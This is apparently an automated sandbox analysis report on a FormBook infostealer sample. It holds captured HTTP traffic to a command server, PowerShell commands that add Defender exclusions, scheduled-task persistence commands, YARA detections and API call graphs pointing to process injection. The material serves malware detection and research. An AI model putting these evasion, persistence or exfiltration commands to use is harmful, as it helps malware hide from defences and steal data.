                                              Data Ascii: avRhn=t5itM9IXjlQHPzAZ+AvkmoxJPajLNa81rphNDyZvH1ELg81jrotTNM/qz4GeGEEh2JCItCe6N4NLmj8dKCSWI7HRBKQOXHTB4MQQoLxeBhy8R7F8LrYqgL4n9ZSW1KYLFUYIM0ar+8YDGUR4RAN5ZtQFjmeqas6wI6pwG/pIj/CQIhiV71UMEzlOpZbQ60bJY1Y3WcvXyMPHtpDsAxNWB7NGjMpY
                                              Jan 11, 2025 05:22:59.498217106 CET | 312 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:22:59 GMT
                                              Content-Type: text/html
                                              Content-Length: 148
                                              Connection: close
                                              ETag: "66a5f968-94"
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                              11 | 192.168.2.8 | 49990 | 154.23.184.95 | 80
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 11, 2025 05:23:01.700735092 CET | 1800 | OUT | POST /ebw6/ HTTP/1.1
                                              Host: www.hm35s.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.hm35s.top
                                              Referer: http://www.hm35s.top/ebw6/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 1242
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 74 35 69 74 4d 39 49 58 6a 6c 51 48 50 7a 41 5a 2b 41 76 6b 6d 6f 78 4a 50 61 6a 4c 4e 61 38 31 72 70 68 4e 44 79 5a 76 48 31 4d 4c 67 50 39 6a 6f 50 78 54 4d 4d 2f 71 36 59 47 66 47 45 45 47 32 49 71 4d 74 43 44 50 4e 37 6c 4c 38 41 30 64 66 47 6d 57 47 4c 48 52 63 36 51 44 50 6e 53 62 34 4d 41 63 6f 4c 68 65 42 68 79 38 52 34 64 38 4e 36 59 71 6d 4c 34 6d 30 35 53 61 6e 36 59 6e 46 55 41 59 4d 79 47 37 2b 73 34 44 47 77 4e 34 54 79 31 35 62 4e 51 48 76 47 65 49 61 73 33 77 49 37 45 4a 47 2b 63 54 6a 39 53 51 59 33 44 72 6d 46 67 73 53 44 6b 34 6c 5a 37 64 30 6b 37 2b 59 31 45 42 58 38 6e 48 79 37 7a 61 71 5a 50 76 56 67 5a 59 58 39 31 76 68 37 59 6b 49 74 32 39 4d 6d 76 65 65 66 75 66 54 36 77 47 48 54 73 33 33 6f 6d 2f 57 66 4d 77 6e 63 38 66 52 69 39 33 7a 7a 78 44 79 32 68 50 47 61 38 65 33 46 59 5a 35 46 45 47 6c 58 50 67 73 2f 34 6c 2f 31 6f 6c 49 78 50 54 4c 32 52 6e 35 32 31 2b 69 56 75 35 46 42 79 64 67 4c 55 57 48 58 6c 45 59 4e 51 49 69 33 30 44 63 69 73 5a 30 5a 4d 6d [TRUNCATED]
                                              Data Ascii: avRhn= [TRUNCATED]
                                              Jan 11, 2025 05:23:02.595653057 CET | 312 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:23:02 GMT
                                              Content-Type: text/html
                                              Content-Length: 148
                                              Connection: close
                                              ETag: "66a5f968-94"
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID: 12 | Source IP: 192.168.2.8 | Source Port: 49991 | Destination IP: 154.23.184.95 | Destination Port: 80
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 11, 2025 05:23:04.242371082 CET | 509 | OUT | GET /ebw6/?avRhn=g7KNPNtXo04gJA8a0AickIpMAuCVSKId0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCZ/YcP8NJRKC5us+1o1KLAKIeLhdJLJPk6Ry+qmxzeVySw==&fjo=vjgP0XDx HTTP/1.1
                                              Host: www.hm35s.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Jan 11, 2025 05:23:05.129399061 CET | 312 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:23:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 148
                                              Connection: close
                                              ETag: "66a5f968-94"
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Target ID:0
                                              Start time:23:20:52
                                              Start date:10/01/2025
                                              Path:C:\Users\user\Desktop\C6Abn5cBei.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\C6Abn5cBei.exe"
                                              Imagebase:0x140000
                                              File size:757'248 bytes
                                              MD5 hash:3F10D9AE24F018B0CA90A3F5B4365C48
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:23:20:58
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe"
                                              Imagebase:0xcf0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:23:20:58
                                              Start date:10/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6ee680000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:23:20:58
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"
                                              Imagebase:0xcf0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:23:20:58
                                              Start date:10/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6ee680000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:23:20:58
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp"
                                              Imagebase:0xee0000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:23:20:58
                                              Start date:10/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6ee680000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:23:20:59
                                              Start date:10/01/2025
                                              Path:C:\Users\user\Desktop\C6Abn5cBei.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\C6Abn5cBei.exe"
                                              Imagebase:0x700000
                                              File size:757'248 bytes
                                              MD5 hash:3F10D9AE24F018B0CA90A3F5B4365C48
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1876826679.0000000001620000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1876572598.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:10
                                              Start time:23:21:02
                                              Start date:10/01/2025
                                              Path:C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                                              Imagebase:0xe50000
                                              File size:757'248 bytes
                                              MD5 hash:3F10D9AE24F018B0CA90A3F5B4365C48
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 63%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:11
                                              Start time:23:21:03
                                              Start date:10/01/2025
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff605670000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:13
                                              Start time:23:21:11
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp"
                                              Imagebase:0xee0000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:14
                                              Start time:23:21:11
                                              Start date:10/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6ee680000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:15
                                              Start time:23:21:12
                                              Start date:10/01/2025
                                              Path:C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\zdDlscHlw.exe"
                                              Imagebase:0x7ff6b84b0000
                                              File size:757'248 bytes
                                              MD5 hash:3F10D9AE24F018B0CA90A3F5B4365C48
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:16
                                              Start time:23:21:29
                                              Start date:10/01/2025
                                              Path:C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe"
                                              Imagebase:0x8d0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              Target ID:17
                                              Start time:23:21:31
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\regini.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\regini.exe"
                                              Imagebase:0x8c0000
                                              File size:41'472 bytes
                                              MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2686152475.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2688254517.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2688146046.0000000003550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              Target ID:20
                                              Start time:23:21:43
                                              Start date:10/01/2025
                                              Path:C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe"
                                              Imagebase:0x8d0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2690431464.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              Target ID:22
                                              Start time:23:21:57
                                              Start date:10/01/2025
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff6d20e0000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                                Execution Graph

                                                Execution Coverage:11.3%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:178
                                                Total number of Limit Nodes:11
                                                execution_graph 25319 243d6c0 DuplicateHandle 25320 243d756 25319->25320 25525 243acf0 25526 243acff 25525->25526 25529 243add8 25525->25529 25534 243ade8 25525->25534 25530 243ae1c 25529->25530 25531 243adf9 25529->25531 25530->25526 25531->25530 25532 243b020 GetModuleHandleW 25531->25532 25533 243b04d 25532->25533 25533->25526 25535 243ae1c 25534->25535 25536 243adf9 25534->25536 25535->25526 25536->25535 25537 243b020 GetModuleHandleW 25536->25537 25538 243b04d 25537->25538 25538->25526 25321 6a4f600 25322 6a4f78b 25321->25322 25323 6a4f626 25321->25323 25323->25322 25325 6a4b660 25323->25325 25326 6a4f880 PostMessageW 25325->25326 25327 6a4f8ec 25326->25327 25327->25323 25328 6a4c181 25329 6a4c267 25328->25329 25330 6a4c18b 25328->25330 25334 6a4e526 25330->25334 25352 6a4e4c0 25330->25352 25369 6a4e4b0 25330->25369 25335 6a4e4b4 25334->25335 25337 6a4e529 25334->25337 25386 6a4e948 25335->25386 25391 6a4ee43 25335->25391 25396 6a4e8e2 25335->25396 25401 6a4ed21 25335->25401 25406 6a4eee1 25335->25406 25414 6a4efc7 25335->25414 25418 6a4ec67 25335->25418 25422 6a4ef79 25335->25422 25426 6a4ecbf 25335->25426 25430 6a4eb1d 25335->25430 25435 6a4f0fd 25335->25435 25440 6a4ea7d 25335->25440 25445 6a4ea11 25335->25445 25451 6a4eb70 25335->25451 25336 6a4e4e2 25336->25329 25337->25329 25353 6a4e4da 25352->25353 25355 6a4ec67 2 API calls 25353->25355 25356 6a4efc7 2 API calls 25353->25356 25357 6a4eee1 4 API calls 25353->25357 25358 6a4ed21 2 API calls 25353->25358 25359 6a4e8e2 2 API calls 25353->25359 25360 6a4ee43 2 API calls 25353->25360 25361 6a4e948 2 API calls 25353->25361 25362 6a4eb70 2 API calls 25353->25362 25363 6a4ea11 2 API calls 25353->25363 25364 6a4ea7d 2 API calls 25353->25364 25365 6a4f0fd 2 API calls 25353->25365 25366 6a4eb1d 2 API calls 25353->25366 25367 6a4ecbf 2 API calls 25353->25367 25368 6a4ef79 2 API calls 25353->25368 25354 6a4e4e2 25354->25329 25355->25354 25356->25354 25357->25354 

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0243D4F6
                                                • GetCurrentThread.KERNEL32 ref: 0243D533
                                                • GetCurrentProcess.KERNEL32 ref: 0243D570
                                                • GetCurrentThreadId.KERNEL32 ref: 0243D5C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: c15f6c92942e8e7c6d36e48aba0534c7b19e85e86b28c3b0f87fec54cb334c92
                                                • Instruction ID: dfaeff2c9f50c1dabecd0d76faac85cd9f03b462d3a17cb8dea61df3ca33e405
                                                • Opcode Fuzzy Hash: c15f6c92942e8e7c6d36e48aba0534c7b19e85e86b28c3b0f87fec54cb334c92
                                                • Instruction Fuzzy Hash: 205154B0D003499FDB55DFAAD548BEEBBF1BF88314F20845AE409A7290DB356944CF29

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0243D4F6
                                                • GetCurrentThread.KERNEL32 ref: 0243D533
                                                • GetCurrentProcess.KERNEL32 ref: 0243D570
                                                • GetCurrentThreadId.KERNEL32 ref: 0243D5C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 1d52dfa6fb04eb1fd7705384fc2918ce2d9fe7b03d51a4beb7f17bf6f4522e9a
                                                • Instruction ID: dd3f1a08d1c2bab433e0a6758a16567bc2e0fc64dd12ddb625982d71b573b5e1
                                                • Opcode Fuzzy Hash: 1d52dfa6fb04eb1fd7705384fc2918ce2d9fe7b03d51a4beb7f17bf6f4522e9a
                                                • Instruction Fuzzy Hash: 085133B0D013099FDB55DFAAD548BDEBBF1BF88314F20845AE409A72A0DB34A944CF65

                                                Control-flow Graph

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A4BD66
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 03b9be3c8dad26b25447d20897d1694efd9908d5b978c812d33afde68fcbe872
                                                • Instruction ID: 55d74f115b41f0e1c703a987e3ee3b788ce0720a6c07204c2dbbe03f29c5fbc2
                                                • Opcode Fuzzy Hash: 03b9be3c8dad26b25447d20897d1694efd9908d5b978c812d33afde68fcbe872
                                                • Instruction Fuzzy Hash: 16A16D71D00219DFEB54EF69CC81BDEBBB2BF88310F1485A9D808A7240DB749985CFA1

                                                Control-flow Graph

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A4BD66
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: ec8d22d6069c6f2dbb3fe18f46eb53f619014404d8297d3963c2f5276fcfbe84
                                                • Instruction ID: 18729b6ef5e924613673c3069d6d7e16b9a0f8dcb28a8faaabea872342bf0113
                                                • Opcode Fuzzy Hash: ec8d22d6069c6f2dbb3fe18f46eb53f619014404d8297d3963c2f5276fcfbe84
                                                • Instruction Fuzzy Hash: 3F915C71D00219DFEB54EF69CC817EEBBB2BF88310F1485A9D808A7250DB759985CFA1

                                                Control-flow Graph

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0243B03E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 2dfb0b73593674c7dc6db1ac54e8d802e07fc8a4d4651828327f976618be96f1
                                                • Instruction ID: 263ce8841351d6ee11298eda531e8a7ba1b9bf996bbc277b0c090e6b5e46b1e7
                                                • Opcode Fuzzy Hash: 2dfb0b73593674c7dc6db1ac54e8d802e07fc8a4d4651828327f976618be96f1
                                                • Instruction Fuzzy Hash: 67711070A00B158FDB25DF2AD44579ABBF1BF88214F00892ED48AD7A40DB75E849CB95

                                                Control-flow Graph

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 024359C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: f6d495166928aa123265a68068d29b28c577dba5329d458e08ce9397fa8528c5
                                                • Instruction ID: 4798ceddaa33ccba01575007123563e0f07fcd55f1b52e9945ee1730d9d841a7
                                                • Opcode Fuzzy Hash: f6d495166928aa123265a68068d29b28c577dba5329d458e08ce9397fa8528c5
                                                • Instruction Fuzzy Hash: 6341E0B0D00719CFEB25DFAAC884BCEBBB5BF48704F60806AD408AB251DB756945CF90

                                                Control-flow Graph

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 024359C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1503103675.0000000002430000.00000040.00000800.00020000.00000000.sdmp, Offset: 02430000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2430000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 0136af51a7e0287c378ec3caaa10d870306b5f0bda7156f13036cef385161250
                                                • Instruction ID: 9fbb478b519f6151465d0ff995b02a1a8f2ebc5dd82a8322638da8fbea185b6a
                                                • Opcode Fuzzy Hash: 0136af51a7e0287c378ec3caaa10d870306b5f0bda7156f13036cef385161250
                                                • Instruction Fuzzy Hash: EE41E0B1D00719CFEB25DFAAC8847CEBBB5BF88714F20816AD408AB251DB75594ACF50

                                                Control-flow Graph

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A4B538
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 37928aca7325f3f31e7f166020e0c32e8768f70302a5dfc3bbf07f7a00f2c205
                                                • Instruction ID: 66a8e41ad82e4c81f4cc66a2e79c1917d4679126dbf4eecd4b1840edf79bdcf2
                                                • Opcode Fuzzy Hash: 37928aca7325f3f31e7f166020e0c32e8768f70302a5dfc3bbf07f7a00f2c205
                                                • Instruction Fuzzy Hash: F62148719003499FDB10DFAAC885BDEFBF5FF88310F108829E919A7241D7789941CBA1

                                                Control-flow Graph

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A4B538
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1528348546.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6a40000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 088dfa20d40be33eba883d5e5e5380c9b19bdd563502259afd98f761008284ea
                                                • Instruction ID: 8247cb10dfac035448a479882e66a1e79e1a5afdb87e3308198bec0685ce63b5
                                                • Opcode Fuzzy Hash: 088dfa20d40be33eba883d5e5e5380c9b19bdd563502259afd98f761008284ea
